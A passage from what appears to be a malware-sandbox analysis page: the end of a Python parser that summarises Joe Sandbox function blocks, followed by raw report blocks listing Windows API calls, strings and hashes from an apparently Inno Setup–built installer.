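            if section == "APIs" and (m := API_RE.match(entry)):
                rec = m.groupdict()
                # Naive comma split: an argument that itself contains commas is cut up (fine for substring matching).
                rec["args"] = [a.strip() for a in (rec["args"] or "").split(",") if a.strip()]
                block.apis.append(rec)
            elif section == "Strings" and (m := STRING_RE.match(entry)):
                block.strings.append((m["text"], m["ref"]))
            elif ":" in entry:                   # dump source, snapshot, similarity hashes
                key, _, value = entry.partition(":")
                block.meta[key.strip()] = value.strip()
    return blocks

def triage(block):
    """Sorted heuristic tags for one block."""
    tags = set()
    for api in block.apis:
        symbolic = [a for a in api["args"] if a != "?" and not HEX_ARG_RE.match(a)]
        if api["name"] == "GetProcAddress" and symbolic:
            tags.add("resolves-api:" + symbolic[-1])       # export name handed to GetProcAddress
        if api["name"].startswith(("RegOpenKey", "RegCreateKey", "RegQueryValue")):
            tags.update("reads-key:" + a for a in symbolic if "\\" in a)
    for text, _ in block.strings:
        if text.lower().startswith(("software\\", "system\\")):
            tags.add("references-key:" + text)
    for text in [t for t, _ in block.strings] + [a for api in block.apis for a in api["args"]]:
        tags.update(tag for needle, tag in TEXT_RULES if needle in text.lower())
    return sorted(tags)

def summarize(text):
    """One record per function: first own call site, own API names, tags and fuzzy hash."""
    out = []
    for block in parse_blocks(text):
        own = [a for a in block.apis if a["caller"] is None]   # drop 'Part of subcall' lines
        out.append({"first_ref": own[0]["ref"] if own else None,
                    "api_names": [a["name"] for a in own],
                    "tags": triage(block),
                    "fuzzy": block.meta.get("Instruction Fuzzy Hash")})
    return out

# Constructed excerpt: four blocks assembled from lines of this report, trimmed for brevity.
SAMPLE = r"""
APIs
• FreeLibrary.KERNEL32(022E0000), ref: 0047BFBC
Strings
• Restarting Windows., xrefs: 0047BFFC
• Not restarting Windows because Setup is being run from the debugger., xrefs: 0047BFDD
Similarity
• Instruction Fuzzy Hash: 2251BF30600A019FD712DB69E899B9A77A4EB59704F60C4BBF808C73A1DB789C45CF9D
APIs
• RegCloseKey.ADVAPI32(00000000,00000000,00000001), ref: 004578FE
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7), ref: 0042DC70
Strings
• SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004578B2
• .NET Framework version %s not found, xrefs: 0045799E
APIs
• GetProcAddress.KERNEL32(022E0000,inflateInit_), ref: 0045B5E1
• GetProcAddress.KERNEL32(022E0000,inflate), ref: 0045B5F1
APIs
  • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
• CloseHandle.KERNEL32(?,?,00000044,00456130,?, /s ",?,regsvr32.exe",?,00456130), ref: 004560A2
"""

if __name__ == "__main__":
    for rec in summarize(SAMPLE):
        print(rec["first_ref"], rec["api_names"], rec["tags"])
```

Paste the report's function blocks (or a text export of them) in place of SAMPLE to run it over the whole analysis; leading indentation is stripped, so the page layout does not matter. Two caveats: "Part of subcall function" lines are attributed to the block they appear in but excluded from its own API list, and the argument values are whatever the sandbox read off the stack at the call site, so symbolic arguments such as the "(FI" tokens in the COMCTL32 block above are noise rather than real strings; extend TEXT_RULES rather than trusting every non-hex argument.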

                                                                            APIs
                                                                              • Part of subcall function 00472DB0: GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                              • Part of subcall function 00472DB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                              • Part of subcall function 00472DB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,B2G), ref: 00472EBD
                                                                            • GetTickCount.KERNEL32 ref: 00472F02
                                                                            • GetTickCount.KERNEL32 ref: 00472F0C
                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00472F61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                            • String ID: B2G$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                            • API String ID: 613034392-3430418260
                                                                            • Opcode ID: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                            • Instruction ID: 8c95786dad12656d13a73ee76c7a4d3a126e112e6abc10061d0091179ba2d091
                                                                            • Opcode Fuzzy Hash: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                            • Instruction Fuzzy Hash: 00319174E002159ADB10EBB9C9867EEB6F09F44304F60843AF548EB392D7BC8E41879D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                              • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 004904A5
                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004904B9
                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004904D3
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904DF
                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904E5
                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904F8
                                                                            Strings
                                                                            • Deleting Uninstall data files., xrefs: 0049041B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                            • String ID: Deleting Uninstall data files.
                                                                            • API String ID: 1570157960-2568741658
                                                                            • Opcode ID: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                            • Instruction ID: c015f2c418b27fe41d2ce248e3be245557a268e7959eb0275d209c4c83f57638
                                                                            • Opcode Fuzzy Hash: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                            • Instruction Fuzzy Hash: DB21BB70344700AEEB21EB76EC55F2B77A8EB55744F60453BBA04DA6D2D6BC9C008B1C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21,?,?,?,?,00000000), ref: 0046BC8B
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21), ref: 0046BCA2
                                                                            • AddFontResourceA.GDI32(00000000), ref: 0046BCBF
                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046BCD3
                                                                            Strings
                                                                            • Failed to open Fonts registry key., xrefs: 0046BCA9
                                                                            • Failed to set value in Fonts registry key., xrefs: 0046BC94
                                                                            • AddFontResource, xrefs: 0046BCDD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                            • API String ID: 955540645-649663873
                                                                            • Opcode ID: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                            • Instruction ID: 8028dfed4777ef4cba2b708c37a4b099d1cdf5d3aae4b1ac28208e9a303e9908
                                                                            • Opcode Fuzzy Hash: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                            • Instruction Fuzzy Hash: E121B2707402047BE710EBA69C42F6E67ACDB55704F60443BB900EB2C2EB7D9E4596AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00416380: GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                              • Part of subcall function 00416380: UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                              • Part of subcall function 00416380: RegisterClassA.USER32(?), ref: 0041643E
                                                                            • GetVersion.KERNEL32 ref: 0045F360
                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0045F39E
                                                                            • SHGetFileInfo.SHELL32(0045F43C,00000000,?,00000160,00004011), ref: 0045F3BB
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0045F3D9
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F3DF
                                                                            • SetCursor.USER32(?,0045F41F,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F412
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                            • String ID: Explorer
                                                                            • API String ID: 2594429197-512347832
                                                                            • Opcode ID: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                            • Instruction ID: 84e95c20810325967785af02823865f4c58c42daffe30e25327ba0847e04abb2
                                                                            • Opcode Fuzzy Hash: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                            • Instruction Fuzzy Hash: 01213A707803046AE710BB769C47F9B36889B0A709F4144BFBF05EA2C3CA7D8C09866D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(00494420,00000000,00401B68), ref: 00401ABD
                                                                            • LocalFree.KERNEL32(007639F0,00000000,00401B68), ref: 00401ACF
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,007639F0,00000000,00401B68), ref: 00401AEE
                                                                            • LocalFree.KERNEL32(00761CF8,?,00000000,00008000,007639F0,00000000,00401B68), ref: 00401B2D
                                                                            • RtlLeaveCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B58
                                                                            • RtlDeleteCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                            • String ID: ,#v
                                                                            • API String ID: 3782394904-3386492414
                                                                            • Opcode ID: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                            • Instruction ID: e723898d31bd980d44dc420abd38e4993862ec3455be7bfe2ac2130caf5f6e99
                                                                            • Opcode Fuzzy Hash: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                            • Instruction Fuzzy Hash: 9D11BF30A003405AEB15AB65EC82F263BE497E570CF44007BF50067AF1D77C9842C76E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,004582E2,?,00000000,00000000,00000000,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458226
                                                                              • Part of subcall function 00452C34: FindClose.KERNEL32(000000FF,00452D2A), ref: 00452D19
                                                                            Strings
                                                                            • Failed to strip read-only attribute., xrefs: 004581F4
                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 0045823F
                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00458200
                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045829B
                                                                            • Deleting directory: %s, xrefs: 004581AF
                                                                            • Stripped read-only attribute., xrefs: 004581E8
                                                                            • Failed to delete directory (%d)., xrefs: 004582BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorFindLast
                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                            • API String ID: 754982922-1448842058
                                                                            • Opcode ID: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                            • Instruction ID: a7040656d29ea07138429a65227d1fe8661808dade238f8de5d3983c6959866f
                                                                            • Opcode Fuzzy Hash: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                            • Instruction Fuzzy Hash: DE41A630A046499ACB00DBA984453BF7AA59B49306F5085BFBC11FB393CF7C890D875E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCapture.USER32 ref: 00422E14
                                                                            • GetCapture.USER32 ref: 00422E23
                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E29
                                                                            • ReleaseCapture.USER32 ref: 00422E2E
                                                                            • GetActiveWindow.USER32 ref: 00422E3D
                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EBC
                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F20
                                                                            • GetActiveWindow.USER32 ref: 00422F2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                            • String ID:
                                                                            • API String ID: 862346643-0
                                                                            • Opcode ID: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                            • Instruction ID: 6da1d0135b9d11ce9028ca126f5481e792b9d420ac57a31bdf33f6cc8c40a84a
                                                                            • Opcode Fuzzy Hash: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                            • Instruction Fuzzy Hash: 83414370B00254AFDB10EBA9DA46B9D77F1EF45304F5540BAF404AB3A2D7B89E41DB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • 73A0A570.USER32(00000000), ref: 004293FA
                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00429403
                                                                              • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00429412
                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0042941F
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00429426
                                                                            • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042942E
                                                                            • GetSystemMetrics.USER32(00000006), ref: 00429453
                                                                            • GetSystemMetrics.USER32(00000006), ref: 0042946D
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                            • String ID:
                                                                            • API String ID: 361401722-0
                                                                            • Opcode ID: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                            • Instruction ID: 2396e8ac942ab906a208d8077257e147ebb5126c2b98df3f18c4b625c9a01c14
                                                                            • Opcode Fuzzy Hash: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                            • Instruction Fuzzy Hash: 3D0104917087103BF710B2B69CC2F6B6188DB9435DF44013FFA469A3D3D56C8C45866A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,00418FC9,0049295D), ref: 0041DD97
                                                                            • 73A14620.GDI32(00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDA1
                                                                            • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDAE
                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DDBD
                                                                            • GetStockObject.GDI32(00000007), ref: 0041DDCB
                                                                            • GetStockObject.GDI32(00000005), ref: 0041DDD7
                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DDE3
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DDF4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectStock$A14620A480A570IconLoad
                                                                            • String ID:
                                                                            • API String ID: 2920975243-0
                                                                            • Opcode ID: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                            • Instruction ID: 26d2215c38f7902349b80dbd4a09bdf013e3c627cae683e10812a8645452cf50
                                                                            • Opcode Fuzzy Hash: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                            • Instruction Fuzzy Hash: 381160B06403415AE700BF659892FA63790DBA5709F00813FF208AF2D2CB7E0C058B5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0045F844
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0045F8D9), ref: 0045F84A
                                                                            • SetCursor.USER32(?,0045F8C1,00007F02,00000000,0045F8D9), ref: 0045F8B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load
                                                                            • String ID: $ $Internal error: Item already expanding
                                                                            • API String ID: 1675784387-1948079669
                                                                            • Opcode ID: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                            • Instruction ID: bc19f93f64f4cfd3b6c64fbb5e4444054adc2e78d3f14390eea5280ae24d604a
                                                                            • Opcode Fuzzy Hash: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                            • Instruction Fuzzy Hash: BAB16B34A006449FDB10DF69C585B9ABBF5AF04305F2484BAEC499B793C778AD4CCB1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                            • API String ID: 390214022-3304407042
                                                                            • Opcode ID: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                            • Instruction ID: abf6614f95991f047cbf872b8675d76fa93f36fd66684b0017750e1831af6413
                                                                            • Opcode Fuzzy Hash: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                            • Instruction Fuzzy Hash: DB910174A002099BDF01EFA5D942BDEB7B5AF49305F50816BE800B7396D7B85E09CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • 76CCE550.OLE32(00493A3C,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A34
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • 76CCE550.OLE32(00493764,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A58
                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00454BB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: E550String$AllocByteCharFreeMultiWide
                                                                            • String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
                                                                            • API String ID: 2757340368-615220198
                                                                            • Opcode ID: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                            • Instruction ID: e28da0ffaceb01cee804717922773e9a91ffd05ea7c596c2a735a488419d39cb
                                                                            • Opcode Fuzzy Hash: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                            • Instruction Fuzzy Hash: 14513371A40105AFDB40DFA9C885F9E7BF8EF4970AF014066B904EB252DB78ED48CB19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004088D0,?,?,?,?,00000000,00000000,00000000,?,004098D7,00000000,004098EA), ref: 004086A2
                                                                              • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                              • Part of subcall function 0040851C: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040871E,?,?,?,00000000,004088D0), ref: 0040852F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultSystem
                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 1044490935-665933166
                                                                            • Opcode ID: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                            • Instruction ID: bc7079e0a6f451a0b148bd409c2e0f1595c2818476049878c3843938bdef3741
                                                                            • Opcode Fuzzy Hash: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                            • Instruction Fuzzy Hash: EB514B34B002486BDB00FAA6C941B9F77A9DB94308F50D47FA141BB3C6CA3DCA06971D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,00411869), ref: 004116FC
                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 004117BA
                                                                              • Part of subcall function 00411A1C: CreatePopupMenu.USER32 ref: 00411A36
                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411846
                                                                              • Part of subcall function 00411A1C: CreateMenu.USER32 ref: 00411A40
                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0041182D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
